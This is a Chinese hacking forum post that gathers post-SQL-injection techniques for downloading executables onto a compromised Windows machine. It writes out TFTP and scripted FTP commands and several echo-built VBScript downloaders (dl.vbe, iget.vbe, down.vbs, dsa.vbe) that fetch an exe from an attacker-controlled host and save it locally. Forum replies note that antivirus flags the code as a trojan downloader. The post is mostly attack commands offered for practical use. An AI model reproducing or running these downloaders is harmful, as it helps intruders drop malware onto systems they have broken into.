信息来源：http://www.hhack.com/

现在好象除了sql注射，没有其他什么好的方法了吧。而sql注射时候，其权限是最BT的，下面是总结出来的大部分拿shell或者system的方法：

1 TFTP
使用方法：在本机或者肉鸡上开了TFTP的服务器
用法：

tftp -i 我的ip或者肉鸡的 get xx.exe
其中-I表示的是以2进制进行传输，不过一般成功几率太低。就是没有防火墙也不好成功，UDP协议就是不如tcp来的稳定啊

或用tinyftpd来代替tftpd32使用

2。FTP 大法
echo open xx.xx.xx.xx>ftp.txt& echo test>>ftp.txt&
echo 123456>>ftp.txt&
echo bin>>ftp.txt& echo get test.exe>>ftp.txt&
echo bye>>ftp.txt
然后就会在CMDSHELL目录下生成一个ftp.txt 里面的内容是：

行ftp -s:ftp.txt命令

3。利用dl.vbe法

利用dl.vbe法
肉鸡cmd中执行：
echo with wscript:if .arguments.count^<2 then
.quit:end if >dl.vbe&
echo set aso=.createobject("adodb.stream"):set
web=createobject("microsoft.xmlhttp") >>dl.vbe&
echo web.open "get",.arguments(0),0:web.send:if
web.status^>200 then quit >>dl.vbe&
echo aso.type=1:aso.open:aso.write
web.responsebody:aso.savetofile
.arguments(1),2:end with >>dl.vbe

用法
cscript dl.vbe http://xx.xx.xx.xx/test.exe
c:\winddows\system32\test.exe


4。利用iget.vbe法
方法同3，
肉鸡cmd中执行：
echo iLocal = LCase(WScript.Arguments(1))
>iget.vbe&
echo iRemote = LCase(WScript.Arguments(0))
>>iget.vbe&
echo Set xPost = CreateObject("Microsoft.XMLHTTP")
>>iget.vbe&
echo xPost.Open "GET",iRemote,0 >>iget.vbe&
echo xPost.Send() >>iget.vbe&
echo Set sGet = CreateObject("ADODB.Stream")
>>iget.vbe&
echo sGet.Mode = 3 >>iget.vbe&
echo sGet.Type = 1 >>iget.vbe&
echo sGet.Open() >>iget.vbe&
echo sGet.Write(xPost.responseBody) >>iget.vbe&
echo sGet.SaveToFile iLocal,2 >>iget.vbe

cscript iget.vbe http://xx.xx.xx.xx/test.exe
test.exe
这里有一个一句话的iget.vbs，推荐一下
echo Set x=
CreateObject(^"Microsoft.XMLHTTP^"):x.Open
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set
s = CreateObject
(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile
LCase(WScript.Arguments(1)),2
>down.vbs



5. 利用Http网站vbe法
echo Set xPost = CreateObject("Microsoft.XMLHTTP")
>dsa.vbe&
echo xPost.Open
"GET","http://xx.xx.xx.xx/test.exe",0 >>dsa.vbe&
echo xPost.Send() >>dsa.vbe&
echo Set sGet = CreateObject("ADODB.Stream")
>>dsa.vbe&
echo sGet.Mode = 3 >>dsa.vbe&
echo sGet.Type = 1 >>dsa.vbe&
echo sGet.Open() >>dsa.vbe&
echo sGet.Write(xPost.responseBody) >>dsa.vbe&
echo sGet.SaveToFile "test.exe",2 >>dsa.vbe

cscript dsa.vbe

6.转换EXE2BAT的方法，这个方法就是把EXE转换成BAT的文件
，不过即使最小的exe，转换了那也大的惊人，不推荐


7.设置匿名访问，利用命令ftp -a:ip地址 ，直接登陆再下载！

8.如果echo不 可用，dir ip > a.txt
dir ftp >> a.txt
…… 管道连贯使用

是不是代码的问题,我的卡巴检测:Trojan-Downloader.JS.gen

引用:

下面是引用superhei于2005-12-16 15:40发表的:
鱼 于 渔的区别啊
3，4，5 说的一个东西

都是在支持ADODB.Stream的情况下 ；）
可能是作者是整理的吧，没有时间去看，直接ctrl+c……ctrl+v了。

同意楼上的说法,除非你用溢出得到SHELL或得到SA权限的注入点..............